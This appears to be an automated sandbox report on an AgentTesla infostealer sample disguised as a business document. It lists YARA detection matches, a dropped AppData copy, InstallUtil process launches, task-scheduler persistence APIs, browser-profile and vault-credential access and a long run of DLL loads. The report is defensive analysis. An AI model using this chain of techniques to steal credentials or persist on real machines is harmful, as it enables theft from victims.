                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.3e24a70.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.3e24a70.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.3e24a70.7.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.3e24a70.7.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.3e24a70.7.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.3e24a70.7.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.3e24a70.7.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.3e24a70.7.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.3e24a70.7.raw.unpack, CqSP68Ir.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.3e24a70.7.raw.unpack, CqSP68Ir.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.3d99570.6.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.3d99570.6.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.3d99570.6.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.3d99570.6.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.3d49550.3.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.3d49550.3.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.3d49550.3.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.3d49550.3.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.3d99570.6.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.3d49550.3.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.3d99570.6.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.3d49550.3.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.3d49550.3.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.3d99570.6.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.3d99570.6.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.3d99570.6.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.3d99570.6.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                        Source: 0.2.Richardson Electronics, LTD. PRD10221301UUE.exe.3d49550.3.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/2@2/2
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeFile created: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                        Source: Richardson Electronics, LTD. PRD10221301UUE.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: Richardson Electronics, LTD. PRD10221301UUE.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: Richardson Electronics, LTD. PRD10221301UUE.exeReversingLabs: Detection: 28%
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeFile read: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exe "C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exe"
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\Eggdjjrhey.exe "C:\Users\user\AppData\Roaming\Eggdjjrhey.exe"
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                        Source: unknownProcess created: C:\Users\user\AppData\Roaming\Eggdjjrhey.exe "C:\Users\user\AppData\Roaming\Eggdjjrhey.exe"
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\Richardson Electronics, LTD. PRD10221301UUE.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wtsapi32.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsta.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Eggdjjrhey.exeSection loaded: sspicli.dllJump to behavior
